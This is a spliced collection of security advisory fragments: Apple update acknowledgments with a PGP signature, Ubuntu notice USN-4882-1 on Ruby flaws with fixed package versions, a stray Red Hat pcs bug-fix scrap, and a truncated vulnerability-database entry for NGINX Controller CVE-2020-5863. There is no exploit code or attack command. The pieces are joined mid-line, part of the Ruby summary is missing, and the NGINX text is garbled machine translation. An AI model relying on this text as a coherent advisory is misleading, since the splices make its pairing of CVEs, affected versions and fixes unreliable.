We would like to acknowledge Andy Davis of NCC Group for their
assistance.
Kernel
We would like to acknowledge Brandon Azad of Google Project Zero,
Stephen Röttger of Google for their assistance.
libxml2
We would like to acknowledge an anonymous researcher for their
assistance.
Entry added December 14, 2020
Login Window
We would like to acknowledge Rob Morton of Leidos for their
assistance.
Photos Storage
We would like to acknowledge Paulos Yibelo of LimeHats for their
assistance.
Quick Look
We would like to acknowledge Csaba Fitzl (@theevilbit) and Wojciech
Reguła of SecuRing (wojciechregula.blog) for their assistance.
Safari
We would like to acknowledge Gabriel Corona and Narendra Bhati From
Suma Soft Pvt. Ltd. Pune (India) @imnarendrabhati for their
assistance.
Security
We would like to acknowledge Christian Starkjohann of Objective
Development Software GmbH for their assistance.
System Preferences
We would like to acknowledge Csaba Fitzl (@theevilbit) of Offensive
Security for their assistance.
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
iQIzBAEBCAAdFiEEbURczHs1TP07VIfuZcsbuWJ6jjAFAl/YDPwACgkQZcsbuWJ6
jjANmhAAoj+ZHNnH2pGDFl2/jrAtvWBtXg8mqw6NtNbGqWDZFhnY5q7Lp8WTx/Pi
x64A4F8bU5xcybnmaDpK5PMwAAIiAg4g1BhpOq3pGyeHEasNx7D9damfqFGKiivS
p8nl62XE74ayfxdZGa+2tOVFTFwqixfr0aALVoQUhAWNeYuvVSgJXlgdGjj+QSL+
9vW86kbQypOqT5TPDg6tpJy3g5s4hotkfzCfxA9mIKOg5e/nnoRNhw0c1dzfeTRO
INzGxnajKGGYy2C3MH6t0cKG0B6cH7aePZCHYJ1jmuAVd0SD3PfmoT76DeRGC4Ri
c8fGD+5pvSF6/+5E+MbH3t3D6bLiCGRFJtYNMpr46gUKKt27EonSiheYCP9xR6lU
ChpYdcgHMOHX4a07/Oo8vEwQrtJ4JryhI9tfBel1ewdSoxk2iCFKzLLYkDMihD6B
1x/9MlaqEpLYBnuKkrRzFINW23TzFPTI/+i2SbUscRQtK0qE7Up5C+IUkRvBGhEs
MuEmEnn5spnVG2EBcKeLtJxtf/h5WaRFrev72EvSVR+Ko8Cj0MgK6IATu6saq8bV
kURL5empvpexFAvVQWRDaLgGBHKM+uArBz2OP6t7wFvD2p1Vq5M+dMrEPna1JO/S
AXZYC9Y9bBRZfYQAv7nxa+uIXy2rGTuQKQY8ldu4eEHtJ0OhaB8=
=T5Y8
-----END PGP SIGNATURE-----
. ==========================================================================
Ubuntu Security Notice USN-4882-1
March 18, 2021
ruby2.3, ruby2.5, ruby2.7 vulnerabilities
==========================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 20.10
- Ubuntu 20.04 LTS
- Ubuntu 18.04 LTS
- Ubuntu 16.04 LTS
Summary:
Several security issues were fixed in Ruby. If a user or automated system were tricked into parsing a specially
crafted JSON file, a remote attacker could use this issue to execute
arbitrary code. This issue only affected Ubuntu 16.04 LTS and Ubuntu 18.04
LTS. (CVE-2020-10663)
It was discovered that Ruby incorrectly handled certain socket memory
operations. A remote attacker could possibly use this issue to obtain
sensitive information. This issue only affected Ubuntu 18.04 LTS and
Ubuntu 20.04 LTS. (CVE-2020-10933)
It was discovered that Ruby incorrectly handled certain transfer-encoding
headers when using Webrick. A remote attacker could possibly use this issue
to bypass a reverse proxy. (CVE-2020-25613)
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 20.10:
libruby2.7 2.7.1-3ubuntu1.2
ruby2.7 2.7.1-3ubuntu1.2
Ubuntu 20.04 LTS:
libruby2.7 2.7.0-5ubuntu1.3
ruby2.7 2.7.0-5ubuntu1.3
Ubuntu 18.04 LTS:
libruby2.5 2.5.1-1ubuntu1.8
ruby2.5 2.5.1-1ubuntu1.8
Ubuntu 16.04 LTS:
libruby2.3 2.3.1-2~ubuntu16.04.15
ruby2.3 2.3.1-2~ubuntu16.04.15
In general, a standard system update will make all the necessary changes. 8.1) - ppc64le, s390x, x86_64
3. Description:
The pcs packages provide a command-line configuration system for the
Pacemaker and Corosync utilities.
Bug Fix(es):
* [GUI] Colocation constraint can't be added (BZ#1840157)
4. 8.1) - aarch64, noarch, ppc64le, s390x, x86_64
3
| VAR-202003-1559 | CVE-2020-5863 | NGINX Controller Unauthorized authentication vulnerability in |
CVSS V2: 7.5 CVSS V3: 8.6 Severity: HIGH |
In NGINX Controller versions prior to 3.2.0, an unauthenticated attacker with network access to the Controller API can create unprivileged user accounts. The user which is created is only able to upload a new license to the system but cannot view or modify any other components of the system. NGINX Controller Exists in a fraudulent authentication vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. NGINX is a lightweight web server/reverse proxy server and e-mail (IMAP/POP3) proxy server of the American NGINX company. The vulnerability stems from the fact that the Controller API does not perform correct access control